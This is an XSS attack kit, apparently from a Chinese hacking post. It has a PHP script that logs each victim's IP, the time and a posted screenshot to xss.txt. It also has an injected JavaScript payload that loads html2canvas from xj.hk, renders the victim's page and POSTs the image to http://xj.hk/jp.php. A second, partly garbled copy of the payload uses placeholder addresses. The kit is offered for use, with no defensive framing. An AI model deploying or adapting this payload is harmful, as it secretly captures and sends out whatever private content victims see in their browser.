<?php
$screenshot=$_POST['screenshot'];
$fp=fopen("xss.txt", "at");
fputs($fp, "TIME: ".date("Y/m/d H:i:s")."  IP: ".$_SERVER['REMOTE_ADDR']."  image : ".$screenshot." \n");
fclose($fp);
?>

获取IP地址并写出至xss.txt

以下是Js截图信息

document.write("<script src=\"https:\/\/调用js代码\"><\/script>");   <br>//调用截屏核心功能js,下载地址:http://xj.hk/html2canvas.js
 
window.onload=function(){
        html2canvas(document.body, {
        onrendered: function(canvas) {
 
//下面开始把抓取到的屏幕图片代码传输和接收,由于代码非常的长,只能使用post
xhr=function(){
        var request = false;
        if(window.XMLHttpRequest){
                request = new XMLHttpRequest();
        }else if (window.ActiveXObject){
                try{
                        request = new window.ActiveXObject('Microsoft.XMLHTTP');
                }catch(e){
                 
                }
        }
 
        return request;
}();
 
request = function(method,src,argv,content_type){
        xhr.open(method,src,false);
        if(method=='POST')xhr.setRequestHeader('Content-type',content_type);
        xhr.send(argv);                                         //发送POST数据
        return xhr.responseText;
};
 
attack_a = function(){
        var src         = "http://xj.hk/jp.php";                 //post接收地址
        var argv_0      = "'&screenshot="+canvas.toDataURL();    //post字段名称为screenshot
        request("POST",src,argv_0,"application/x-www-form-urlencoded");
};
 
attack_a();
 
 
                                  }
                                });
                        }
// JavaScript Documentindow.onload=function(){
        html2canvas(document.body, {
        onrendered: function(canvas) {
 
//下面开始把抓取到的屏幕图片代码传输和接收,由于代码非常的长,只能使用post
xhr=function(){
        var request = false;
        if(window.XMLHttpRequest){
                request = new XMLHttpRequest();
        }else if (window.ActiveXObject){
                try{
                        request = new window.ActiveXObject('Microsoft.XMLHTTP');
                }catch(e){
                 
                }
        }
 
        return request;
}();
 
request = function(method,src,argv,content_type){
        xhr.open(method,src,false);
        if(method=='POST')xhr.setRequestHeader('Content-type',content_type);
        xhr.send(argv);                                         //发送POST数据
        return xhr.responseText;
};
 
attack_a = function(){
        var src         = "调用php地址";                 //post接收地址
        var argv_0      = "'&screenshot="+canvas.toDataURL();    //post字段名称为screenshot
        request("POST",src,argv_0,"application/x-www-form-urlencoded");
};
 
attack_a();
 
 
                                  }
                                });
                        }